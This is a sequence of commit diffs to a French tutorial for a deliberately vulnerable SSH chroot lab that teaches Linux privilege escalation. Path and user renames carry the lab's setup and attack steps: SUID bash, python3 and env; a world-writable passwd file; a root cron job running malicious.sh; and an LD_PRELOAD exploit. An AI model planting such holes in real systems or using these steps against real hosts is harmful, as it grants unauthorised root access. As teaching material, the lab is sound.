<commit_message>
Tuto.docx - Chemins et utilisateur corrigés (jailed→user, /var/www/html→/home/user)
</commit_message>
<xml_diff>
--- a/Tuto.docx
+++ b/Tuto.docx
@@ -149,7 +149,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> chmod 4755 /var/www/html/bin/</w:t>
+        <w:t xml:space="preserve"> chmod 4755 /home/user/bin/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -353,7 +353,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>jailed</w:t>
+        <w:t>user</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
       <w:r>
@@ -452,7 +452,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> /var/www/html/</w:t>
+        <w:t xml:space="preserve"> /home/user/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -507,7 +507,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> chmod 666 /var/www/html/</w:t>
+        <w:t xml:space="preserve"> chmod 666 /home/user/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -820,7 +820,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> -p /var/www/html/</w:t>
+        <w:t xml:space="preserve"> -p /home/user/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -883,7 +883,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> "* * * * * root /var/www/html/</w:t>
+        <w:t xml:space="preserve"> "* * * * * root /home/user/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -919,7 +919,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> tee /var/www/html/</w:t>
+        <w:t xml:space="preserve"> tee /home/user/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -992,7 +992,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> chmod 777 /var/www/html/</w:t>
+        <w:t xml:space="preserve"> chmod 777 /home/user/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1073,16 +1073,16 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>jailed</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve"> peut modifier le script /var/www/html/tmp/malicious.sh :</w:t>
+        <w:t>user</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> peut modifier le script /home/user/tmp/malicious.sh :</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1136,7 +1136,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>' &gt; /var/www/html/tmp/malicious.sh</w:t>
+        <w:t>' &gt; /home/user/tmp/malicious.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1199,7 +1199,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> /var/www/html/</w:t>
+        <w:t xml:space="preserve"> /home/user/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1235,7 +1235,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> &amp;&amp; chmod 4755 /var/www/html/</w:t>
+        <w:t xml:space="preserve"> &amp;&amp; chmod 4755 /home/user/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1271,24 +1271,24 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>' &gt;&gt; /var/www/html/tmp/malicious.sh</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>chmod +x /var/www/html/tmp/malicious.sh</w:t>
+        <w:t>' &gt;&gt; /home/user/tmp/malicious.sh</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>chmod +x /home/user/tmp/malicious.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1358,7 +1358,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>/var/www/html/</w:t>
+        <w:t>/home/user/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1564,7 +1564,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> /var/www/html/bin/</w:t>
+        <w:t xml:space="preserve"> /home/user/bin/</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1591,7 +1591,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> chmod 4755 /var/www/html/bin/</w:t>
+        <w:t xml:space="preserve"> chmod 4755 /home/user/bin/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -1981,7 +1981,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> -o /var/www/html/tmp/exploit.so </w:t>
+        <w:t xml:space="preserve"> -o /home/user/tmp/exploit.so </w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2036,7 +2036,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> LD_PRELOAD=/var/www/html/tmp/exploit.so /bin/ls</w:t>
+        <w:t xml:space="preserve"> LD_PRELOAD=/home/user/tmp/exploit.so /bin/ls</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2178,7 +2178,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> jailed@192.168.92.147</w:t>
+        <w:t xml:space="preserve"> user@192.168.92.147</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2551,7 +2551,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> /var/www/html/</w:t>
+        <w:t xml:space="preserve"> /home/user/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2587,7 +2587,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> &amp;&amp; chmod 4755 /var/www/html/</w:t>
+        <w:t xml:space="preserve"> &amp;&amp; chmod 4755 /home/user/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2623,7 +2623,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>' &gt; /var/www/html/tmp/malicious.sh</w:t>
+        <w:t>' &gt; /home/user/tmp/malicious.sh</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2683,7 +2683,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve">    /var/www/html/</w:t>
+        <w:t xml:space="preserve">    /home/user/</w:t>
       </w:r>
       <w:proofErr w:type="spellStart"/>
       <w:r>
@@ -2834,7 +2834,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>jailed</w:t>
+        <w:t>user</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
@@ -2946,7 +2946,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t xml:space="preserve"> /var/www/html</w:t>
+        <w:t xml:space="preserve"> /home/user</w:t>
       </w:r>
     </w:p>
     <w:sectPr>

</xml_diff>

<commit_message>
Refactoring: user → jailed (évite conflit avec utilisateur existant)
- setup_jail.sh : utilisateur 'jailed' au lieu de 'user'
- cleanup_jail.sh : nettoyage adapté
- vuln_*.sh : chemins /home/jailed
- README.md : documentation mise à jour
- Tuto.docx : documentation complète
- jail-lab.html : ajout de la documentation HTML
</commit_message>
<xml_diff>
--- a/Tuto.docx
+++ b/Tuto.docx
@@ -863,7 +863,7 @@
         <w:rPr>
           <w:rStyle w:val="NormalTok"/>
         </w:rPr>
-        <w:t xml:space="preserve"> user</w:t>
+        <w:t xml:space="preserve"> jailed</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -908,7 +908,7 @@
         <w:rPr>
           <w:rStyle w:val="StringTok"/>
         </w:rPr>
-        <w:t xml:space="preserve">"Match User user"</w:t>
+        <w:t xml:space="preserve">"Match User jailed"</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -988,7 +988,7 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t xml:space="preserve">│   │            CHROOT JAIL (/home/user)                 │   │</w:t>
+        <w:t xml:space="preserve">│   │            CHROOT JAIL (/home/jailed)               │   │</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -1165,7 +1165,7 @@
               <w:rPr>
                 <w:rStyle w:val="VerbatimChar"/>
               </w:rPr>
-              <w:t xml:space="preserve">user</w:t>
+              <w:t xml:space="preserve">jailed</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -1230,7 +1230,7 @@
         <w:rPr>
           <w:rStyle w:val="NormalTok"/>
         </w:rPr>
-        <w:t xml:space="preserve"> user@</w:t>
+        <w:t xml:space="preserve"> jailed@</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1619,7 +1619,7 @@
         <w:rPr>
           <w:rStyle w:val="NormalTok"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 4755 /home/user/bin/bash</w:t>
+        <w:t xml:space="preserve"> 4755 /home/jailed/bin/bash</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -1634,7 +1634,7 @@
         <w:rPr>
           <w:rStyle w:val="NormalTok"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 4755 /home/user/bin/python3</w:t>
+        <w:t xml:space="preserve"> 4755 /home/jailed/bin/python3</w:t>
       </w:r>
     </w:p>
     <w:bookmarkEnd w:id="35"/>
@@ -1661,7 +1661,7 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t xml:space="preserve">user</w:t>
+        <w:t xml:space="preserve">jailed</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">) :</w:t>
@@ -1882,7 +1882,7 @@
         <w:rPr>
           <w:rStyle w:val="NormalTok"/>
         </w:rPr>
-        <w:t xml:space="preserve"> /home/user/etc/passwd</w:t>
+        <w:t xml:space="preserve"> /home/jailed/etc/passwd</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -1897,7 +1897,7 @@
         <w:rPr>
           <w:rStyle w:val="NormalTok"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 666 /home/user/etc/passwd</w:t>
+        <w:t xml:space="preserve"> 666 /home/jailed/etc/passwd</w:t>
       </w:r>
     </w:p>
     <w:bookmarkEnd w:id="40"/>
@@ -1924,7 +1924,7 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t xml:space="preserve">user</w:t>
+        <w:t xml:space="preserve">jailed</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">) :</w:t>
@@ -2151,7 +2151,7 @@
         <w:rPr>
           <w:rStyle w:val="NormalTok"/>
         </w:rPr>
-        <w:t xml:space="preserve"> /home/user/etc/cron.d/</w:t>
+        <w:t xml:space="preserve"> /home/jailed/etc/cron.d/</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -2172,7 +2172,7 @@
         <w:rPr>
           <w:rStyle w:val="StringTok"/>
         </w:rPr>
-        <w:t xml:space="preserve">"* * * * * root /home/user/tmp/malicious.sh"</w:t>
+        <w:t xml:space="preserve">"* * * * * root /home/jailed/tmp/malicious.sh"</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2190,7 +2190,7 @@
         <w:rPr>
           <w:rStyle w:val="NormalTok"/>
         </w:rPr>
-        <w:t xml:space="preserve"> /home/user/etc/cron.d/vuln_cron</w:t>
+        <w:t xml:space="preserve"> /home/jailed/etc/cron.d/vuln_cron</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -2205,7 +2205,7 @@
         <w:rPr>
           <w:rStyle w:val="NormalTok"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 777 /home/user/etc/cron.d/vuln_cron</w:t>
+        <w:t xml:space="preserve"> 777 /home/jailed/etc/cron.d/vuln_cron</w:t>
       </w:r>
     </w:p>
     <w:bookmarkEnd w:id="45"/>
@@ -2232,7 +2232,7 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t xml:space="preserve">user</w:t>
+        <w:t xml:space="preserve">jailed</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">) :</w:t>
@@ -2515,7 +2515,7 @@
         <w:rPr>
           <w:rStyle w:val="NormalTok"/>
         </w:rPr>
-        <w:t xml:space="preserve"> /usr/bin/env /home/user/bin/</w:t>
+        <w:t xml:space="preserve"> /usr/bin/env /home/jailed/bin/</w:t>
       </w:r>
       <w:r>
         <w:br/>
@@ -2530,7 +2530,7 @@
         <w:rPr>
           <w:rStyle w:val="NormalTok"/>
         </w:rPr>
-        <w:t xml:space="preserve"> 4755 /home/user/bin/env</w:t>
+        <w:t xml:space="preserve"> 4755 /home/jailed/bin/env</w:t>
       </w:r>
     </w:p>
     <w:bookmarkEnd w:id="49"/>
@@ -2557,7 +2557,7 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t xml:space="preserve">user</w:t>
+        <w:t xml:space="preserve">jailed</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">) :</w:t>
@@ -3391,22 +3391,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Les utilisateurs</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">user</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">et</w:t>
+        <w:t xml:space="preserve">L’utilisateur</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -3439,7 +3424,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Les répertoires</w:t>
+        <w:t xml:space="preserve">Le répertoire</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
@@ -3448,22 +3433,7 @@
         <w:rPr>
           <w:rStyle w:val="VerbatimChar"/>
         </w:rPr>
-        <w:t xml:space="preserve">/home/user</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">et</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/var/www/html</w:t>
+        <w:t xml:space="preserve">/home/jailed</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4500,7 +4470,6 @@
     <w:link w:val="VerbatimChar"/>
     <w:pPr>
       <w:wordWrap w:val="off"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
     </w:pPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="KeywordTok">
@@ -4508,96 +4477,85 @@
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
       <w:b/>
-      <w:color w:val="204a87"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="007020"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="DataTypeTok">
     <w:name w:val="DataTypeTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="204a87"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="902000"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="DecValTok">
     <w:name w:val="DecValTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="0000cf"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="40a070"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="BaseNTok">
     <w:name w:val="BaseNTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="0000cf"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="40a070"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="FloatTok">
     <w:name w:val="FloatTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="0000cf"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="40a070"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="ConstantTok">
     <w:name w:val="ConstantTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="8f5902"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="880000"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="CharTok">
     <w:name w:val="CharTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="4e9a06"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="4070a0"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="SpecialCharTok">
     <w:name w:val="SpecialCharTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:b/>
-      <w:color w:val="ce5c00"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="4070a0"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="StringTok">
     <w:name w:val="StringTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="4e9a06"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="4070a0"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="VerbatimStringTok">
     <w:name w:val="VerbatimStringTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="4e9a06"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="4070a0"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="SpecialStringTok">
     <w:name w:val="SpecialStringTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="4e9a06"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="bb6688"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="ImportTok">
     <w:name w:val="ImportTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:b/>
+      <w:color w:val="008000"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="CommentTok">
@@ -4605,18 +4563,15 @@
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
       <w:i/>
-      <w:color w:val="8f5902"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="60a0b0"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="DocumentationTok">
     <w:name w:val="DocumentationTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:b/>
       <w:i/>
-      <w:color w:val="8f5902"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="ba2121"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="AnnotationTok">
@@ -4625,8 +4580,7 @@
     <w:rPr>
       <w:b/>
       <w:i/>
-      <w:color w:val="8f5902"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="60a0b0"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="CommentVarTok">
@@ -4635,33 +4589,28 @@
     <w:rPr>
       <w:b/>
       <w:i/>
-      <w:color w:val="8f5902"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="60a0b0"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="OtherTok">
     <w:name w:val="OtherTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="8f5902"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="007020"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="FunctionTok">
     <w:name w:val="FunctionTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:b/>
-      <w:color w:val="204a87"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="06287e"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="VariableTok">
     <w:name w:val="VariableTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="000000"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="19177c"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="ControlFlowTok">
@@ -4669,56 +4618,46 @@
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
       <w:b/>
-      <w:color w:val="204a87"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="007020"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="OperatorTok">
     <w:name w:val="OperatorTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:b/>
-      <w:color w:val="ce5c00"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="666666"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="BuiltInTok">
     <w:name w:val="BuiltInTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="008000"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="ExtensionTok">
     <w:name w:val="ExtensionTok"/>
     <w:basedOn w:val="VerbatimChar"/>
-    <w:rPr>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
-    </w:rPr>
+    <w:rPr/>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="PreprocessorTok">
     <w:name w:val="PreprocessorTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:i/>
-      <w:color w:val="8f5902"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="bc7a00"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="AttributeTok">
     <w:name w:val="AttributeTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="204a87"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="7d9029"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="RegionMarkerTok">
     <w:name w:val="RegionMarkerTok"/>
     <w:basedOn w:val="VerbatimChar"/>
-    <w:rPr>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
-    </w:rPr>
+    <w:rPr/>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="InformationTok">
     <w:name w:val="InformationTok"/>
@@ -4726,8 +4665,7 @@
     <w:rPr>
       <w:b/>
       <w:i/>
-      <w:color w:val="8f5902"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="60a0b0"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="WarningTok">
@@ -4736,16 +4674,15 @@
     <w:rPr>
       <w:b/>
       <w:i/>
-      <w:color w:val="8f5902"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="60a0b0"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="AlertTok">
     <w:name w:val="AlertTok"/>
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
-      <w:color w:val="ef2929"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:b/>
+      <w:color w:val="ff0000"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="ErrorTok">
@@ -4753,16 +4690,13 @@
     <w:basedOn w:val="VerbatimChar"/>
     <w:rPr>
       <w:b/>
-      <w:color w:val="a40000"/>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
+      <w:color w:val="ff0000"/>
     </w:rPr>
   </w:style>
   <w:style w:type="character" w:customStyle="1" w:styleId="NormalTok">
     <w:name w:val="NormalTok"/>
     <w:basedOn w:val="VerbatimChar"/>
-    <w:rPr>
-      <w:shd w:val="clear" w:fill="f8f8f8"/>
-    </w:rPr>
+    <w:rPr/>
   </w:style>
 </w:styles>
 </file>

</xml_diff>

<commit_message>
v2.1: fix rbash→bash, isolation par chroot SSH uniquement
rbash bloquait la connexion SSH chroot (ForceCommand /bin/bash rejeté
par rbash car contient /). L'isolation est désormais assurée uniquement
par ChrootDirectory SSH, rbash est retiré.

- setup_jail.sh: useradd -s /bin/bash, PATH=/bin:/usr/bin, rbash retiré
- README.md: rbash retiré, mention ChrootDirectory comme mécanisme d'isolation
- jail-lab.html: rbash retiré de l'architecture
- Tuto.docx: régénéré sans rbash, isolation par ChrootDirectory expliquée

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
</commit_message>
<xml_diff>
--- a/Tuto.docx
+++ b/Tuto.docx
@@ -8,7 +8,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t>JAIL v2 — Laboratoire de Privilege Escalation Linux</w:t>
+        <w:t>JAIL v2.1 — Laboratoire de Privilege Escalation Linux</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -48,7 +48,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>JAIL v2 est un environnement chroot SSH vulnerable concu pour l'apprentissage des techniques d'elevation de privileges sous Linux. L'utilisateur "jailed" est enferme dans un chroot via la configuration SSH (Match User + ChrootDirectory) avec un jeu limite de binaires.</w:t>
+        <w:t>JAIL v2.1 est un environnement chroot SSH vulnerable concu pour l'apprentissage des techniques d'elevation de privileges sous Linux. L'utilisateur "jailed" est enferme dans un chroot via la configuration SSH (Match User + ChrootDirectory) avec un jeu limite de binaires. L'isolation repose entierement sur le ChrootDirectory SSH, pas sur un shell restreint.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -166,7 +166,7 @@
       <w:r>
         <w:t>/home/jailed/           # Racine du chroot (ChrootDirectory)</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  bin/                  # bash, rbash, ls, cat, mkdir, rm, touch,</w:t>
+        <w:t xml:space="preserve">  bin/                  # bash, ls, cat, mkdir, rm, touch,</w:t>
         <w:br/>
         <w:t xml:space="preserve">                        # python3, vim, env, find, grep, chmod,</w:t>
         <w:br/>
@@ -199,7 +199,7 @@
         <w:t xml:space="preserve">IMPORTANT : </w:t>
       </w:r>
       <w:r>
-        <w:t>Le chroot SSH est le mecanisme qui enferme reellement l'utilisateur jailed dans /home/jailed lors de la connexion SSH. Sans cette configuration, l'utilisateur accede au systeme de fichiers complet.</w:t>
+        <w:t>L'isolation de l'utilisateur jailed repose entierement sur le ChrootDirectory SSH. L'utilisateur a un shell bash standard (/bin/bash). C'est la directive ChrootDirectory dans sshd_config qui enferme l'utilisateur dans /home/jailed lors de la connexion SSH. Aucun shell restreint (rbash) n'est utilise.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -307,7 +307,7 @@
